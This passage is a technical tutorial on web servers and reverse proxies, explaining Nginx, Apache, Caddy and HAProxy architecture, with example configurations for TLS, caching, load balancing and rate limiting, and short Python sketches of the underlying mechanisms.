
Web Servers and Reverse Proxies

Web servers and reverse proxies are critical infrastructure components that sit between clients and application servers, handling HTTP traffic, SSL/TLS termination, load balancing, static file serving, and more. Understanding how they work is essential for deploying and operating web applications in production.

How Web Traffic Flows in Production

A typical production request flow involves multiple layers, each adding functionality (and latency):

Client (Browser/App)
    │
    ▼
DNS Resolution (Route 53, Cloudflare)
    │  Recursive resolver → Root → TLD → Authoritative
    │  Cached at each layer (TTL-based)
    ▼
CDN (CloudFront, Cloudflare) ──── Cache HIT? → Return cached response
    │ Cache MISS
    ▼
Load Balancer (ALB, Nginx, HAProxy)
    │  Distributes across healthy backends
    │  L4 (TCP) or L7 (HTTP) routing
    ▼
Reverse Proxy / Web Server (Nginx, Caddy)
    │  - SSL/TLS termination
    │  - Static file serving
    │  - Request routing
    │  - Rate limiting
    │  - Compression (gzip/brotli)
    │  - Request/response header manipulation
    ▼
Application Server (Gunicorn, uvicorn, Node.js, Actix)
    │  Business logic execution
    ▼
Backend Services (Database, Cache, Message Queue, External APIs)

DNS Resolution in Detail

When a browser needs to resolve api.example.com:

  1. Browser cache: Checks its own DNS cache (Chrome: chrome://net-internals/#dns)
  2. OS cache: Checks the operating system's DNS resolver cache
  3. Recursive resolver: Sends query to configured DNS server (ISP, 8.8.8.8, 1.1.1.1)
  4. Root nameserver: Directs to the .com TLD nameserver
  5. TLD nameserver: Directs to example.com's authoritative nameserver
  6. Authoritative nameserver: Returns the IP address (or CNAME, then another lookup)

Each answer includes a TTL (Time to Live) that determines how long the result is cached. Short TTLs (60s) enable fast failover but increase DNS query load; long TTLs (3600s) reduce load but delay propagation of changes.
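The TTL mechanics above are easy to model: a cache stores each answer with an expiry, and once the expiry lapses the resolver must query upstream again. A minimal sketch (the class and names are illustrative, not any real resolver's API):

```python
import time

class DnsCache:
    """Toy TTL cache illustrating how resolvers cache DNS answers."""
    def __init__(self):
        self._store = {}  # name -> (ip, expires_at)

    def put(self, name, ip, ttl):
        self._store[name] = (ip, time.monotonic() + ttl)

    def get(self, name):
        entry = self._store.get(name)
        if entry is None:
            return None            # cache miss: would query upstream
        ip, expires_at = entry
        if time.monotonic() >= expires_at:
            del self._store[name]  # TTL expired: entry is stale
            return None
        return ip
```

A short TTL means `get` starts returning None (forcing a fresh lookup) soon after a record changes, which is exactly why low TTLs give fast failover at the cost of more upstream queries.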

HTTP Protocol Versions

Version  | Multiplexing                                                                            | Header Compression | Transport  | Key Improvement
---------|-----------------------------------------------------------------------------------------|--------------------|------------|----------------
HTTP/1.1 | No (one request at a time per TCP connection; pipelining suffers head-of-line blocking) | No                 | TCP        | Persistent connections, chunked transfer
HTTP/2   | Yes (multiple streams over one TCP connection)                                          | HPACK              | TCP        | Eliminates HOL blocking at the HTTP level, server push
HTTP/3   | Yes (multiple streams over QUIC)                                                        | QPACK              | QUIC (UDP) | Eliminates TCP HOL blocking, faster handshakes (0-RTT)

HTTP/2 is the baseline for modern web serving. It reduces latency by multiplexing requests over a single TCP connection, compressing headers, and allowing server push. However, TCP's head-of-line blocking means a single lost packet stalls all streams.

HTTP/3 solves this by using QUIC (built on UDP), where each stream is independent—a lost packet only stalls its own stream. QUIC also combines the TLS and transport handshakes, achieving 0-RTT connection establishment for repeat visitors.

The TLS Handshake

Every HTTPS connection begins with a TLS handshake that establishes encryption:

TLS 1.3 Handshake (1 round trip):

Client                              Server
  │                                    │
  │──── ClientHello ──────────────────▶│  Supported cipher suites, key share
  │                                    │
  │◀─── ServerHello + Certificate ─────│  Chosen cipher, server cert, key share
  │     EncryptedExtensions            │
  │     Finished                       │
  │                                    │
  │──── Finished ─────────────────────▶│  Client confirms
  │                                    │
  │◀═══ Encrypted Application Data ═══▶│  All subsequent data encrypted

TLS 1.3 reduced the handshake from 2 round trips (TLS 1.2) to 1 round trip, and supports 0-RTT (zero round trip time) for repeat connections by caching session parameters. The trade-off with 0-RTT is replay attack vulnerability—it should only be used for idempotent requests (GET).
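In Python's standard ssl module, pinning a client to TLS 1.3 is a one-liner; the commented-out connection would then perform the one-round-trip handshake diagrammed above (the hostname is a placeholder):

```python
import ssl

# Client context that refuses anything older than TLS 1.3.
ctx = ssl.create_default_context()
ctx.minimum_version = ssl.TLSVersion.TLSv1_3

# Connecting would run the 1-RTT handshake shown above:
# import socket
# with socket.create_connection(("example.com", 443)) as sock:
#     with ctx.wrap_socket(sock, server_hostname="example.com") as tls:
#         print(tls.version())   # "TLSv1.3" on servers that support it
```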

Nginx

Nginx (pronounced "engine-x") is the most widely used web server and reverse proxy, serving approximately 34% of all websites. It uses an asynchronous, event-driven architecture that handles thousands of concurrent connections efficiently with minimal memory overhead.

Core Architecture

Nginx uses a master-worker process model:

  • Master process: Reads configuration, binds to ports, manages worker processes. Runs as root (needs root for port 80/443) but workers run as unprivileged user (nginx or www-data).
  • Worker processes: Handle actual HTTP requests. Each worker is single-threaded but uses non-blocking I/O (epoll on Linux, kqueue on BSD/macOS) to handle thousands of connections concurrently.
              ┌── Master Process ──┐
              │  Config loading    │
              │  Port binding      │
              │  Worker management │
              └────────┬───────────┘
           ┌───────────┼───────────┐
           ▼           ▼           ▼
      ┌─Worker 1─┐ ┌─Worker 2─┐ ┌─Worker N─┐
      │ Event    │ │ Event    │ │ Event    │
      │ loop     │ │ loop     │ │ loop     │
      │ (epoll)  │ │ (epoll)  │ │ (epoll)  │
      │          │ │          │ │          │
      │ 1000s of │ │ 1000s of │ │ 1000s of │
      │ conns    │ │ conns    │ │ conns    │
      └──────────┘ └──────────┘ └──────────┘

Why event-driven is efficient: Traditional web servers (Apache prefork) spawn a process per connection—10,000 connections means 10,000 processes, each consuming ~10MB of memory. Nginx handles 10,000 connections in a single worker process using ~25MB total, because it never blocks waiting for I/O. Instead, it registers callbacks with the OS kernel (epoll_wait) and processes events as they become ready.

How epoll works: The Linux kernel's epoll system call efficiently monitors thousands of file descriptors. When a worker calls epoll_wait(), the kernel returns only the file descriptors that have activity (data received, write buffer available). The worker processes these events, initiates non-blocking I/O operations, and loops back to epoll_wait(). This means a single thread can manage thousands of concurrent connections with near-zero idle overhead.
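This loop can be sketched with Python's selectors module, whose DefaultSelector is backed by epoll on Linux and kqueue on BSD/macOS. A toy non-blocking echo server showing the register/wait/dispatch cycle (all names here are ours, not Nginx's):

```python
import selectors
import socket

# DefaultSelector picks the best readiness mechanism available:
# epoll on Linux, kqueue on BSD/macOS.
sel = selectors.DefaultSelector()

def accept(server_sock):
    conn, _ = server_sock.accept()   # ready: accept() won't block
    conn.setblocking(False)
    sel.register(conn, selectors.EVENT_READ, echo)

def echo(conn):
    data = conn.recv(4096)           # ready: recv() won't block
    if data:
        conn.sendall(data)           # echo back (real servers buffer writes)
    else:
        sel.unregister(conn)         # peer closed the connection
        conn.close()

def run_once(timeout=1.0):
    # One turn of the event loop: block until some fd is ready,
    # then dispatch each ready fd to its registered callback.
    for key, _ in sel.select(timeout):
        key.data(key.fileobj)
```

A real worker calls the equivalent of `run_once` forever; because no callback ever blocks on I/O, one thread interleaves thousands of connections.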

Configuration Deep Dive

Location Matching

Nginx evaluates location blocks in a specific priority order:

# Priority order (highest to lowest):
# 1. Exact match (=)
location = /favicon.ico { }           # Only matches exactly "/favicon.ico"

# 2. Preferential prefix (^~)
location ^~ /static/ { }              # Prefix match, stops regex search

# 3. Regular expression (~ case-sensitive, ~* case-insensitive)
location ~ \.php$ { }                 # Matches *.php (case-sensitive)
location ~* \.(jpg|png|gif)$ { }      # Matches image files (case-insensitive)

# 4. Prefix match (longest wins)
location /api/ { }                     # Matches /api/anything
location /api/v2/ { }                  # Matches /api/v2/anything (longer prefix wins)
location / { }                         # Catch-all (shortest prefix)

The matching algorithm: Nginx first checks all prefix locations and remembers the longest match. Then it checks regex locations in config order—the first regex match wins. If no regex matches, the longest prefix match is used. The = modifier skips all other checks, and ^~ skips regex checking.
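The three passes can be written out directly. This toy matcher mirrors the algorithm just described (ignoring nginx details like nested and named locations):

```python
import re

def match_location(uri, locations):
    """Toy model of Nginx location selection.

    locations: list of (modifier, pattern) in config order, where the
    modifier is one of "=", "^~", "~", "~*", or "" (plain prefix).
    """
    # Pass 1: exact matches win immediately.
    for mod, pat in locations:
        if mod == "=" and uri == pat:
            return (mod, pat)
    # Pass 2: remember the longest matching prefix (plain or ^~).
    best = None
    for mod, pat in locations:
        if mod in ("", "^~") and uri.startswith(pat):
            if best is None or len(pat) > len(best[1]):
                best = (mod, pat)
    # ^~ on the longest prefix suppresses the regex pass.
    if best and best[0] == "^~":
        return best
    # Pass 3: first regex match in config order wins.
    for mod, pat in locations:
        if mod == "~" and re.search(pat, uri):
            return (mod, pat)
        if mod == "~*" and re.search(pat, uri, re.IGNORECASE):
            return (mod, pat)
    # Fall back to the longest prefix match, if any.
    return best

locs = [
    ("=", "/favicon.ico"),
    ("^~", "/static/"),
    ("~", r"\.php$"),
    ("~*", r"\.(jpg|png|gif)$"),
    ("", "/api/"),
    ("", "/api/v2/"),
    ("", "/"),
]
```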

Upstream Configuration

upstream app_backend {
    # Load balancing algorithm
    least_conn;                    # Route to server with fewest active connections
    # Other options: round-robin (the default when none is specified), ip_hash, hash, random

    # Backend servers with configuration
    server 127.0.0.1:8001 weight=3;        # Gets 3x traffic
    server 127.0.0.1:8002 weight=1;        # Gets 1x traffic
    server 127.0.0.1:8003 backup;          # Only used if others are down
    server 127.0.0.1:8004 down;            # Marked as permanently unavailable

    # Health checking (passive — based on actual traffic)
    # max_fails: number of failed attempts before marking server as unavailable
    # fail_timeout: time window for max_fails AND how long to mark server as down
    server 127.0.0.1:8005 max_fails=3 fail_timeout=30s;

    # Keep-alive connections to upstream (reduces TCP handshake overhead)
    keepalive 32;                  # Pool of 32 keep-alive connections per worker
    keepalive_timeout 60s;         # Close idle connections after 60 seconds
    keepalive_requests 1000;       # Max requests per keep-alive connection
}
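least_conn with weights reduces to a few lines: nginx compares active connections scaled by weight, so a heavier server is allowed proportionally more in-flight requests. A toy picker (the real implementation also breaks ties round-robin style, omitted here):

```python
class Backend:
    def __init__(self, addr, weight=1):
        self.addr = addr
        self.weight = weight
        self.active = 0        # current in-flight requests

def pick_least_conn(backends):
    # Weight-aware least-connections: lowest active/weight ratio wins.
    return min(backends, key=lambda b: b.active / b.weight)

pool = [Backend("127.0.0.1:8001", weight=3), Backend("127.0.0.1:8002", weight=1)]
chosen = pick_least_conn(pool)
chosen.active += 1   # request starts; decrement when it completes
```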

Caching Configuration

# Define a cache zone (in http block)
proxy_cache_path /var/cache/nginx/app
    levels=1:2                    # Two-level directory hashing
    keys_zone=app_cache:10m       # 10MB of shared memory for cache keys (~80,000 keys)
    max_size=1g                   # Maximum disk usage
    inactive=60m                  # Remove cached items not accessed in 60 minutes
    use_temp_path=off;            # Write directly to cache dir (better performance)

server {
    location /api/ {
        proxy_pass http://app_backend;
        proxy_cache app_cache;

        # Cache configuration
        proxy_cache_valid 200 10m;         # Cache 200 responses for 10 minutes
        proxy_cache_valid 404 1m;          # Cache 404 responses for 1 minute
        proxy_cache_valid any 5m;          # Cache everything else for 5 minutes
        proxy_cache_key "$scheme$request_method$host$request_uri";
        proxy_cache_use_stale error timeout updating http_500 http_502 http_503;
        # ↑ Serve stale cached content when backend is erroring or updating

        # Add headers to show cache status
        add_header X-Cache-Status $upstream_cache_status;
        # Values: MISS, HIT, STALE, UPDATING, BYPASS, EXPIRED, REVALIDATED

        # Bypass cache for specific conditions
        proxy_cache_bypass $http_authorization;    # Don't cache authenticated requests
        proxy_no_cache $http_authorization;
    }
}
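The interplay of proxy_cache_valid and proxy_cache_use_stale boils down to: serve fresh entries, refresh expired ones from the backend, and fall back to the stale copy when the backend errors. A toy model (the status strings mimic $upstream_cache_status values):

```python
import time

class ProxyCache:
    """Toy sketch of proxy_cache_valid + proxy_cache_use_stale semantics."""
    def __init__(self):
        self._store = {}  # key -> (body, fresh_until)

    def fetch(self, key, upstream, valid_for=600):
        entry = self._store.get(key)
        now = time.monotonic()
        if entry and now < entry[1]:
            return entry[0], "HIT"            # still fresh
        try:
            body = upstream()                 # go to the backend
        except Exception:
            if entry:
                return entry[0], "STALE"      # backend erroring: serve stale
            raise                             # no cached copy to fall back on
        self._store[key] = (body, now + valid_for)
        return body, ("EXPIRED" if entry else "MISS")
```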

WebSocket Proxying

WebSocket connections require special proxy configuration because they upgrade from HTTP to a persistent bidirectional protocol:

location /ws/ {
    proxy_pass http://app_backend;
    proxy_http_version 1.1;

    # These headers are required for WebSocket upgrade
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";

    proxy_set_header Host $host;
    proxy_set_header X-Real-IP $remote_addr;

    # WebSocket connections are long-lived — increase timeouts
    proxy_read_timeout 3600s;      # 1 hour
    proxy_send_timeout 3600s;
}

Performance Tuning

# /etc/nginx/nginx.conf — Performance-optimized configuration

# Worker processes: one per CPU core
worker_processes auto;

# File descriptor limit per worker (must be >= worker_connections * 2)
worker_rlimit_nofile 65535;

events {
    worker_connections 4096;       # Max connections per worker
    use epoll;                     # Linux kernel event notification mechanism
    multi_accept on;               # Accept multiple connections at once
}

http {
    # Sendfile: let the kernel send files directly from disk to socket
    # bypassing user-space (zero-copy). Crucial for static file performance.
    sendfile on;

    # tcp_nopush: send headers and the beginning of a file in one TCP packet
    # Works with sendfile. Reduces number of packets for large file transfers.
    tcp_nopush on;

    # tcp_nodelay: disable Nagle's algorithm — send data immediately
    # without waiting to fill a TCP packet. Reduces latency for small responses.
    tcp_nodelay on;

    # Keep-alive optimization
    keepalive_timeout 65;          # Close idle connections after 65 seconds
    keepalive_requests 10000;      # Max requests per keep-alive connection

    # Buffer optimization
    client_body_buffer_size 16k;   # Buffer for client request bodies
    client_header_buffer_size 1k;  # Buffer for client request headers
    large_client_header_buffers 4 8k;  # For large headers (cookies, auth tokens)
    client_max_body_size 10m;      # Max upload size

    # Proxy buffer optimization
    proxy_buffer_size 4k;          # Buffer for first part of response (headers)
    proxy_buffers 8 16k;           # 8 buffers of 16k for response body
    proxy_busy_buffers_size 32k;   # Max size of buffers being sent to client

    # Compression
    gzip on;
    gzip_vary on;                  # Add Vary: Accept-Encoding header
    gzip_proxied any;              # Compress proxied responses too
    gzip_comp_level 4;             # 1-9 (4 is good balance of CPU vs compression)
    gzip_min_length 1000;          # Don't compress tiny responses
    gzip_types
        text/plain
        text/css
        text/xml
        text/javascript
        application/json
        application/javascript
        application/xml
        application/rss+xml
        image/svg+xml;

    # Logging (optional: disable access log for high-traffic static assets)
    access_log /var/log/nginx/access.log;
    error_log /var/log/nginx/error.log warn;
}

Worker connections calculation: Each proxy connection uses 2 file descriptors (one for client, one for upstream). So worker_connections 4096 supports ~2048 simultaneous proxy connections per worker. With 4 workers, that's ~8192 concurrent connections. Adjust worker_rlimit_nofile to at least worker_connections * 2.

Security Configuration

# Rate limiting: multiple zones for different endpoints
limit_req_zone $binary_remote_addr zone=general:10m rate=30r/s;
limit_req_zone $binary_remote_addr zone=auth:10m rate=5r/m;
limit_req_zone $binary_remote_addr zone=api:10m rate=100r/s;

# Connection limiting
limit_conn_zone $binary_remote_addr zone=addr:10m;

server {
    listen 443 ssl http2;
    server_name example.com;

    # SSL/TLS Configuration (modern)
    ssl_certificate /etc/letsencrypt/live/example.com/fullchain.pem;
    ssl_certificate_key /etc/letsencrypt/live/example.com/privkey.pem;
    ssl_protocols TLSv1.2 TLSv1.3;
    ssl_ciphers 'ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384';
    ssl_prefer_server_ciphers off;     # Let client choose (TLS 1.3 ignores this)

    # OCSP Stapling: server fetches certificate revocation status and sends it
    # to clients, avoiding the client needing to contact the CA
    ssl_stapling on;
    ssl_stapling_verify on;
    ssl_trusted_certificate /etc/letsencrypt/live/example.com/chain.pem;
    resolver 8.8.8.8 8.8.4.4 valid=300s;

    # Session caching: avoid repeating full TLS handshake for returning clients
    ssl_session_cache shared:SSL:10m;
    ssl_session_timeout 1d;
    ssl_session_tickets off;       # Disable for forward secrecy

    # Security Headers
    add_header X-Frame-Options "SAMEORIGIN" always;
    add_header X-Content-Type-Options "nosniff" always;
    add_header X-XSS-Protection "1; mode=block" always;   # legacy; modern browsers ignore this header
    add_header Referrer-Policy "strict-origin-when-cross-origin" always;
    add_header Strict-Transport-Security "max-age=31536000; includeSubDomains; preload" always;
    add_header Content-Security-Policy "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'" always;
    add_header Permissions-Policy "camera=(), microphone=(), geolocation=()" always;

    # Hide Nginx version
    server_tokens off;

    # Request size limit (prevent upload abuse)
    client_max_body_size 10m;

    # Rate limiting applied per location
    location /api/auth/ {
        limit_req zone=auth burst=3 nodelay;
        limit_conn addr 5;
        proxy_pass http://app_backend;
    }

    location /api/ {
        limit_req zone=api burst=20 nodelay;
        # burst=20: allow bursts of 20 requests beyond the rate
        # nodelay: process burst requests immediately (don't queue them)
        proxy_pass http://app_backend;
    }
}

Rate limiting explained: rate=100r/s creates a token bucket that fills at 100 tokens per second. Each request consumes one token. burst=20 adds a buffer of 20 tokens. Without nodelay, excess requests within the burst are delayed (queued); with nodelay, they're processed immediately but the burst bucket still drains at the configured rate.
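The token-bucket behavior just described (with nodelay) can be sketched directly:

```python
import time

class TokenBucket:
    """Toy model of limit_req with nodelay: rate = fill rate, burst = depth."""
    def __init__(self, rate, burst):
        self.rate = rate               # tokens added per second
        self.capacity = burst          # headroom beyond the steady rate
        self.tokens = burst            # start full
        self.last = time.monotonic()

    def allow(self):
        now = time.monotonic()
        # Refill proportionally to elapsed time, capped at capacity.
        self.tokens = min(self.capacity,
                          self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= 1:
            self.tokens -= 1
            return True                # request proceeds immediately
        return False                   # rejected (nginx returns 503 by default)
```

Without nodelay, a rejected-but-within-burst request would instead be queued until a token accrues; this sketch models only the immediate accept/deny path.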

Production Configuration Example

# /etc/nginx/nginx.conf — Complete production configuration

user nginx;
worker_processes auto;
pid /run/nginx.pid;
worker_rlimit_nofile 65535;
error_log /var/log/nginx/error.log warn;

events {
    worker_connections 4096;
    use epoll;
    multi_accept on;
}

http {
    include /etc/nginx/mime.types;
    default_type application/octet-stream;

    # Logging format with timing info
    log_format main '$remote_addr - $remote_user [$time_local] '
                    '"$request" $status $body_bytes_sent '
                    '"$http_referer" "$http_user_agent" '
                    'rt=$request_time uct=$upstream_connect_time '
                    'uht=$upstream_header_time urt=$upstream_response_time';

    access_log /var/log/nginx/access.log main;

    sendfile on;
    tcp_nopush on;
    tcp_nodelay on;
    keepalive_timeout 65;
    keepalive_requests 10000;

    gzip on;
    gzip_vary on;
    gzip_proxied any;
    gzip_comp_level 4;
    gzip_min_length 1000;
    gzip_types text/plain text/css text/xml text/javascript
               application/json application/javascript application/xml
               image/svg+xml;

    # Rate limiting zones
    limit_req_zone $binary_remote_addr zone=auth:10m rate=5r/m;
    limit_req_zone $binary_remote_addr zone=api:10m rate=100r/s;

    # Upstream backends
    upstream app_backend {
        least_conn;
        server 127.0.0.1:8001 max_fails=3 fail_timeout=30s;
        server 127.0.0.1:8002 max_fails=3 fail_timeout=30s;
        server 127.0.0.1:8003 max_fails=3 fail_timeout=30s;
        keepalive 64;
    }

    # HTTP → HTTPS redirect
    server {
        listen 80;
        server_name example.com www.example.com;
        return 301 https://example.com$request_uri;
    }

    # www → non-www redirect
    server {
        listen 443 ssl http2;
        server_name www.example.com;
        ssl_certificate /etc/letsencrypt/live/example.com/fullchain.pem;
        ssl_certificate_key /etc/letsencrypt/live/example.com/privkey.pem;
        return 301 https://example.com$request_uri;
    }

    # Main server block
    server {
        listen 443 ssl http2;
        server_name example.com;

        ssl_certificate /etc/letsencrypt/live/example.com/fullchain.pem;
        ssl_certificate_key /etc/letsencrypt/live/example.com/privkey.pem;
        ssl_protocols TLSv1.2 TLSv1.3;
        ssl_session_cache shared:SSL:10m;
        ssl_session_timeout 1d;
        ssl_stapling on;
        ssl_stapling_verify on;

        add_header Strict-Transport-Security "max-age=31536000; includeSubDomains" always;
        add_header X-Frame-Options "SAMEORIGIN" always;
        add_header X-Content-Type-Options "nosniff" always;
        server_tokens off;

        # Static files
        location /static/ {
            alias /var/www/app/static/;
            expires 365d;
            add_header Cache-Control "public, immutable";
            access_log off;
        }

        # Health check endpoint (for load balancer)
        location = /health {
            access_log off;
            default_type text/plain;
            return 200 "healthy\n";
        }

        # Auth endpoints (strict rate limiting)
        location /api/auth/ {
            limit_req zone=auth burst=3 nodelay;
            proxy_pass http://app_backend;
            include /etc/nginx/proxy_params;
        }

        # API endpoints
        location /api/ {
            limit_req zone=api burst=20 nodelay;
            proxy_pass http://app_backend;
            include /etc/nginx/proxy_params;
        }

        # WebSocket
        location /ws/ {
            proxy_pass http://app_backend;
            proxy_http_version 1.1;
            proxy_set_header Upgrade $http_upgrade;
            proxy_set_header Connection "upgrade";
            proxy_read_timeout 3600s;
            include /etc/nginx/proxy_params;
        }

        # Frontend (SPA)
        location / {
            root /var/www/app/dist;
            try_files $uri $uri/ /index.html;
        }
    }
}

Apache HTTP Server

Apache is one of the oldest and most configurable web servers (since 1995). Unlike Nginx's event-driven model, Apache traditionally uses a process-per-connection (prefork) or thread-per-connection (worker) model, though the modern event MPM is event-driven.

Multi-Processing Modules (MPMs)

MPM     | Model                      | Connections        | Memory               | Use Case
--------|----------------------------|--------------------|----------------------|---------
prefork | One process per connection | Low (hundreds)     | High (~10MB/process) | PHP mod_php (not thread-safe), maximum stability
worker  | Thread pool per process    | Medium (thousands) | Medium (~1MB/thread) | Thread-safe applications, moderate traffic
event   | Event-driven + thread pool | High (thousands)   | Lower                | Modern default, similar to Nginx for keep-alive

The event MPM is Apache's answer to Nginx's efficiency. It uses dedicated threads to handle keep-alive connections, freeing worker threads to process requests. For keep-alive-heavy workloads, event MPM dramatically reduces resource usage compared to prefork.

Apache vs. Nginx

Feature        | Nginx                                       | Apache
---------------|---------------------------------------------|-------
Architecture   | Event-driven, async                         | Process/thread per connection (or event MPM)
Performance    | Excellent for static content, reverse proxy | Good, but higher memory per connection
Configuration  | Centralized files, requires reload          | .htaccess for per-directory overrides (no reload)
Module loading | Compiled-in or dynamic (limited)            | Highly modular, dynamic loading at runtime
URL rewriting  | rewrite directive (simpler)                 | mod_rewrite (powerful but complex regex engine)
Use case       | Reverse proxy, load balancer, static files  | Dynamic content (mod_php), .htaccess flexibility
Market share   | ~34%                                        | ~29% (declining)

When to use Apache: Apache's .htaccess files allow per-directory configuration without reloading the server—useful for shared hosting where users need to configure their own URL rewrites, authentication, and caching rules. However, .htaccess has a performance cost: Apache checks for .htaccess files in every directory in the path for every request.

mod_rewrite

Apache's mod_rewrite is a powerful URL rewriting engine used for redirects, pretty URLs, and complex routing:

# .htaccess — Common mod_rewrite patterns

RewriteEngine On

# Force HTTPS
RewriteCond %{HTTPS} off
RewriteRule ^(.*)$ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301]

# Remove trailing slash
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)/$ /$1 [L,R=301]

# SPA fallback (route all non-file requests to index.html)
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.html [L]

# Proxy API requests to backend (requires mod_proxy and mod_proxy_http)
RewriteRule ^api/(.*)$ http://localhost:8080/api/$1 [P,L]

Caddy

Caddy is a modern web server written in Go, notable for automatic HTTPS (obtains and renews Let's Encrypt certificates automatically with zero configuration).

Automatic HTTPS Internals

Caddy implements the ACME (Automatic Certificate Management Environment) protocol to obtain certificates from Let's Encrypt:

  1. Challenge: Caddy proves domain ownership using one of:
       • HTTP-01: place a token at http://domain/.well-known/acme-challenge/TOKEN (requires port 80)
       • TLS-ALPN-01: present a self-signed certificate with a specific ALPN extension during the TLS handshake (requires port 443)
       • DNS-01: create a DNS TXT record at _acme-challenge.domain (works behind firewalls, supports wildcards)
  2. Issuance: once verified, Let's Encrypt issues the certificate (valid for 90 days)
  3. Renewal: Caddy automatically renews certificates ~30 days before expiration
  4. OCSP stapling: Caddy automatically staples OCSP responses
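For reference, the HTTP-01 challenge response is mechanical: the server answers at a well-known path with the token joined to a base64url-encoded SHA-256 thumbprint of the account key's canonical JWK (RFC 7638). A sketch of just that string-building step:

```python
import base64
import hashlib

def challenge_path(token):
    # The URL the ACME server fetches over plain HTTP on port 80.
    return f"/.well-known/acme-challenge/{token}"

def key_authorization(token, account_jwk_json):
    """HTTP-01 body: token || '.' || base64url(SHA-256(canonical JWK)).

    account_jwk_json must already be the RFC 7638 canonical serialization
    of the account key (required members only, sorted, no whitespace).
    """
    thumbprint = hashlib.sha256(account_jwk_json.encode()).digest()
    b64 = base64.urlsafe_b64encode(thumbprint).rstrip(b"=").decode()
    return f"{token}.{b64}"
```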

Caddyfile Configuration

# Caddyfile — Caddy's configuration format
example.com {
    # Automatic HTTPS — no SSL config needed!

    # Reverse proxy to application
    reverse_proxy /api/* localhost:8080 {
        # Load balancing
        lb_policy least_conn

        # Health checking
        health_uri /health
        health_interval 10s
        health_timeout 5s

        # Headers
        header_up X-Real-IP {remote_host}
        header_up X-Forwarded-Proto {scheme}

        # Transport configuration
        transport http {
            keepalive 30s
            keepalive_idle_conns 64
        }
    }

    # Static file serving
    root * /var/www/site
    file_server {
        hide .git .env
    }

    # Compression
    encode gzip zstd

    # Security headers
    header {
        X-Frame-Options "SAMEORIGIN"
        X-Content-Type-Options "nosniff"
        Strict-Transport-Security "max-age=31536000"
        -Server                         # Remove Server header
    }

    # Rate limiting (requires the third-party caddy-ratelimit plugin)
    rate_limit {
        zone per_ip {
            key    {remote_host}
            events 100
            window 1m
        }
    }

    # Logging
    log {
        output file /var/log/caddy/access.log {
            roll_size 100mb
            roll_keep 5
        }
        format json
    }
}

Caddy vs. Nginx: Caddy's primary advantages are automatic HTTPS, simpler configuration syntax, and a single binary with no dependencies. Nginx has a larger ecosystem, more community resources, and marginally better raw performance for extremely high-throughput scenarios. For most applications, the difference is negligible, and Caddy's simplicity reduces operational risk.

HAProxy

HAProxy (High Availability Proxy) is a dedicated, high-performance load balancer and proxy. While Nginx handles both web serving and proxying, HAProxy is purpose-built for proxying and load balancing, and excels at very high connection rates (millions of concurrent connections).

Architecture

HAProxy uses a single-process, event-driven model (similar to Nginx workers). It's designed for maximum throughput and minimum latency in the proxy path.

Configuration

# /etc/haproxy/haproxy.cfg

global
    log /dev/log local0
    maxconn 50000
    user haproxy
    group haproxy
    daemon

    # SSL tuning
    ssl-default-bind-options ssl-min-ver TLSv1.2
    ssl-default-bind-ciphers ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256
    tune.ssl.default-dh-param 2048

defaults
    log     global
    mode    http                    # Layer 7 mode (use 'tcp' for Layer 4)
    option  httplog                 # Detailed HTTP logging
    option  dontlognull             # Don't log health check connections
    option  forwardfor              # Add X-Forwarded-For header
    timeout connect 5s
    timeout client  30s
    timeout server  30s
    timeout http-keep-alive 10s
    timeout http-request 10s        # Max time for client to send full request

    # Retry on connection failure
    retries 3
    option redispatch               # Retry on a different server if one fails

# Stats dashboard (accessible at :8404/stats)
frontend stats
    bind *:8404
    stats enable
    stats uri /stats
    stats refresh 10s
    stats auth admin:secretpassword

# Frontend: incoming traffic
frontend http_front
    bind *:80
    bind *:443 ssl crt /etc/ssl/certs/example.pem
    redirect scheme https if !{ ssl_fc }

    # Route based on host header
    acl is_api hdr(host) -i api.example.com
    acl is_web hdr(host) -i www.example.com

    use_backend api_servers if is_api
    default_backend web_servers

# Backend: API servers
backend api_servers
    balance leastconn
    option httpchk GET /health      # Active health checking

    # Health check configuration
    default-server inter 5s fall 3 rise 2
    # inter: check every 5s | fall: 3 failures = down | rise: 2 successes = up

    server api1 10.0.1.10:8080 check weight 100
    server api2 10.0.1.11:8080 check weight 100
    server api3 10.0.1.12:8080 check weight 50    # Smaller instance, less traffic

    # Connection draining: when a server is marked "drain",
    # existing connections finish but no new ones are routed
    # Useful during deployments: mark server drain → wait → deploy → mark ready

# Backend: Web servers
backend web_servers
    balance roundrobin
    option httpchk GET /health
    cookie SRVID insert indirect nocache  # Session persistence via cookie

    server web1 10.0.2.10:3000 check cookie web1
    server web2 10.0.2.11:3000 check cookie web2
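The inter/fall/rise semantics reduce to a small state machine: consecutive failed checks knock a server down, consecutive successes bring it back. A toy version (names are ours, not HAProxy's):

```python
class HealthState:
    """Toy fall/rise state machine (cf. HAProxy: inter 5s fall 3 rise 2)."""
    def __init__(self, fall=3, rise=2):
        self.fall, self.rise = fall, rise
        self.up = True
        self.streak = 0    # consecutive results disagreeing with current state

    def record(self, check_ok):
        if check_ok == self.up:
            self.streak = 0                   # result confirms current state
            return self.up
        self.streak += 1
        if self.up and self.streak >= self.fall:
            self.up, self.streak = False, 0   # fall threshold: mark down
        elif not self.up and self.streak >= self.rise:
            self.up, self.streak = True, 0    # rise threshold: mark up
        return self.up
```

In a real checker, `record` would be driven every `inter` seconds by the result of the `option httpchk` probe.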

HAProxy Stick Tables

Stick tables track connection information for rate limiting, session persistence, and abuse detection:

# Rate limiting with stick tables
frontend http_front
    bind *:443 ssl crt /etc/ssl/certs/example.pem

    # Track request rates per IP
    stick-table type ip size 100k expire 30s store http_req_rate(10s)
    http-request track-sc0 src
    http-request deny deny_status 429 if { sc_http_req_rate(0) gt 100 }
    # ↑ Deny with 429 if more than 100 requests in 10 seconds from same IP
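A stick table tracking http_req_rate is essentially a sliding window of timestamps per key; the deny rule fires when the window's count exceeds the threshold. A toy version:

```python
import time
from collections import defaultdict, deque

class ReqRateTable:
    """Toy stick table: per-key request rate over a sliding time window."""
    def __init__(self, window=10.0):
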